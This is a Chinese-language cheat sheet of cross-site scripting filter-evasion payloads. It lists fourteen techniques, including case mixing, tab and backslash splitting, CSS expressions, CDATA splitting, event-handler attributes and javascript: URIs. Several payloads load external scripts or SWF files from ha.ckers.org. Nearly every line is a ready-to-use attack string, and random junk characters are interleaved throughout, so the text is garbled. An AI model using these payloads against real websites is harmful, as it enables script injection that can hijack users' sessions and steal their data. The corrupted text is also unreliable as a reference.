1. 改变字符大小写
/ z4 [7 J5 X1 _* P" p2 P) I2 h G% ^0 \
( X! r; x; U' \9 O0 y1 p* v! o+ L% o) G
<sCript>alert(‘d’)</scRipT>
$ w' B9 B. h4 [' h! T4 q9 O
# o& L! O8 d, Y. h2. 利用多加一些其它字符来规避Regular Expression的检查1 Y$ i, E5 J; M& ?
6 e% J- Y% c4 Q! a6 K0 O6 ^( ?' A
<<script>alert(‘c’)//<</script>
+ @5 L( Z- @! O3 P- b( ?" t- V7 K1 E* I' u
<SCRIPT a=">" SRC="t.js"></SCRIPT>
/ o9 s& \# c1 `3 Q* m6 G; \" M+ C. G
<SCRIPT =">" SRC="t.js"></SCRIPT>
- n) I% }: A% t9 [' j7 _! t& O) H9 t9 N, Q, U
<SCRIPT a=">" ” SRC="t.js"></SCRIPT>6 S6 N9 c5 U' X: J1 j8 {
8 F% ~" T/ C; m4 W6 Q2 K <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
) S; I9 z0 L) y9 n* _% a y0 O! K4 G! \4 }& }$ d6 W
<SCRIPT a=`>` SRC="t.js"></SCRIPT>
! \1 `1 q" L: b. ~: h" I1 Q2 U# L* V t2 R- r' A' ~
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>9 d3 h* l4 R1 w1 j. w: u
$ c" y5 [! {' J7 a- ~; q3. 以其它扩展名取代.js' b5 x# E8 X v9 I
2 i8 S5 v+ t' D- B8 P$ c: h* F <script src="bad.jpg"></script>
* `) E+ V: J3 s' k% i! F% K: d2 f& b
4. 将Javascript写在CSS档里, m+ D! }5 A6 R, v
, u: S" S8 H9 d Z3 O; r* [
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">7 | Z/ [9 u- ?6 [6 R% f1 n
7 }% Z9 t7 }+ Y5 x example:: f: \ r2 S2 P" L f5 a( Z l
% m- ?# e) C' h2 } body {2 l6 S1 U7 W- T; o y2 f8 F
, H% T' ^: |6 K# u) s background-image: url(‘javascript:alert("XSS");’)5 @+ A2 p$ }1 i. z1 K; Q8 ?; h- |2 l
$ U7 _7 S& X% P$ p
}
+ N( O& ?3 F( [( ?) C' d# ]* L+ h1 C+ r3 a+ W
+ ?% q0 e3 m1 p5. 在script的tag里加入一些其它字符 l4 C5 n3 R+ U, E: u
+ U3 k# a2 E+ o z
<SCRIPT/SRC="t.js"></SCRIPT>
& m, p& I5 g# v- J5 s
* Y) U+ @: x; A' U' z( C <SCRIPT/anyword SRC="t.js"></SCRIPT>
9 J* M! d3 m, f2 b* Y4 \5 O. V% q6 U( P
6. 使用tab或是new line来规避
& [4 A7 T3 ^4 [" V' L0 ]2 r
4 Z0 Y! J- Y% Q <img src="jav ascr ipt:alert(‘XSS3′)">6 G3 k, v2 \# @1 h. i* F0 J( q
- |7 R3 S: F/ Y' X) F# p3 N7 s S
<img src="jav ascr ipt:alert(‘XSS3′)">! b1 f" }' |$ d6 R' [
4 {5 i9 v; k# R- z# T
<IMG SRC="jav ascript:alert(‘XSS’);">( C) U5 u: J: C: G
* @6 O- y/ u/ d# B
-> tag
- Z4 C2 T- i6 U. Y; }/ K: H/ O3 }4 m/ r f
-> new line
/ B, W( J0 y, U [, Z7 ?0 M3 H
7 |- v+ o3 f5 D4 V( T; C6 z& O7. 使用"\"来规避& R) D6 l0 n8 T! I! a' O. D7 K
. `/ }3 g) b# t4 F1 g
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>1 W9 ~! k9 K" L! p3 i
5 A& m8 L# ?8 h& T8 [ <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
0 Y" O1 Z L# F, B* m3 V/ J: L: y; g
a9 v# B3 f9 ^( L6 v, ? <IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">* j! g. o- e6 g; g( y; v8 p
5 W) U6 c7 s; a; k$ l$ I6 m <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
( p( w7 s9 j1 V
8 H+ J) l; m. K/ y6 W, A <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>
3 m9 @1 E, w+ m$ F. b- I) z7 d+ J- X! }
8. 使用Hex encode来规避(也可能会把";"拿掉)
7 [" S* `$ `% e$ @/ W' M# u+ K
<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">& i: y5 K' a% U/ I. @8 P$ Z
$ m' |8 P1 P3 h }# Q0 M 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
6 Z- [, d4 b/ Y$ d: X" H' T% T) w+ V0 T5 Z6 u' g
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">& {) v# F6 M. \& w' k; J$ z
1 O; |8 W& y- n/ n) o6 V- y
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
3 |8 ~" k) ~8 z7 d9 e# n' t! e/ A5 x
7 U% e5 ^# _3 O( r$ ]9. script in HTML tag
4 h) V- _9 j) ^$ Y- G
0 x- u, ^; [$ U3 O& p+ H, M <body onload=」alert(‘onload’)」>1 j' s) g+ {- ~; F- k1 t8 \
" n0 ^- T' P- H6 Z4 T* z; u6 O onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload5 H$ Y: Q* \ M) g/ N5 z8 \
T; [5 A8 Q. H, @
10. 在swf里含有xss的code
6 q9 T' y0 H5 R! D7 I
9 ]- v; I' g+ I0 U% S" S3 [0 _ <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
& `, N, c( y3 I* o8 P. G w. Z U$ C& S% W: i1 C! F; T
11. 利用CDATA将xss的code拆开,再组合起来。5 S/ d0 m0 r, U: T
/ }0 h% T7 Q7 S" J# W. Q
<XML ID=I><X><C> B) b; Z% @' j1 G0 y& W0 w
! u, C9 o7 z& C4 Y+ Q) x2 C
<![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
# }7 c: \: T p
+ d, G$ _& l: Y' F </C></X>
2 ]1 f4 F! q8 g: F$ a
1 n% ?% |% d: p7 ~$ Q4 s, g5 Q </xml>4 O2 I4 j7 C$ l2 `0 Z/ c
: c, K, T* |$ G. ?$ d
<SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
* Z! o% P% y3 t: {& K5 m$ b
& [& i; J% L) k- l <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>
0 U6 i% i$ r4 L F5 y4 Z
: c; Z. y. B2 o <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>: t+ d' E( l* r8 V) U! c) t# \
5 Z$ w' l. j+ c1 K6 I. M, B
12. 利用HTML+TIME。
2 Z! {) @) E5 R3 U. d$ `- s
4 n- R2 n' i- c9 \# w <HTML><BODY>
8 V; Y+ g) w. _& e7 [. D& C' ?" G. e' d" T6 r- h x: O( B' m' ?
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">5 Y; [: ~6 f% u5 ], y
: g6 O+ p2 r/ ^7 R3 v! ~ <?import namespace="t" implementation="#default#time2">
* ]6 r! ~8 k1 ~: @- f$ [/ A% o) F# D- [- E
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
2 T6 y, M- z* D
% U; V E" W w4 N7 o* w </BODY></HTML>
& Y! c. ^+ w6 {3 s* x J$ j! P
1 o0 \$ r( P, S& P0 s13. 透过META写入Cookie。4 b! T; e" s6 Q! \; b
, P6 \% O& ?" q! k7 {* y
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">4 A* z" i2 m* ^/ _
) i* ]/ n: X, j
14. javascript in src , href , url6 B4 }! s9 P2 @1 J, N( c ~5 C
- o* @7 u' w4 I2 k3 w
<IFRAME SRC=javascript:alert(’13′)></IFRAME>
3 a( C8 \( g& f& l' \: R+ y( c. d, d7 G5 J8 m" ^
<img src="javascript:alert(‘XSS3′)">. q; z9 K# c& r. M. z
6 l: y8 }( j }
<IMG DYNSRC="javascript:alert(‘XSS20′)">
2 p7 F+ O, Z4 R j3 i! E
- |8 g# Y5 m) K3 U: W% @0 L <IMG LOWSRC="javascript:alert(‘XSS21′)">
% Z6 K H7 {3 L2 m# r, U
. ^8 g0 ?! R6 P5 J! o$ L9 `) M9 H6 G <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">& p- ]3 }1 T& m0 ~ L9 S
6 Q8 C& s+ ^. O* v7 u <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>
: P2 x/ Z) V5 g9 `; |$ t$ n. B* ^3 N; S/ H# G
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
E3 g" T7 C1 [& h; w8 Z, B4 G4 A* b: @& P; E$ M, K
<DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">7 r7 b6 z7 m n: O$ F. Y4 L7 j0 i K
9 C0 _7 z" ~5 R( A- t
<STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}: X) [- u0 ^* C7 A
6 J3 C) L/ G; S
</STYLE><A CLASS=XSS></A>( w4 o- Z6 @- T
& d7 n8 [5 a9 U' `' l" S, ]) C <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
: Z. x3 @' J2 c$ c( n1 E+ Q+ B" G! g/ C1 n# P& M
|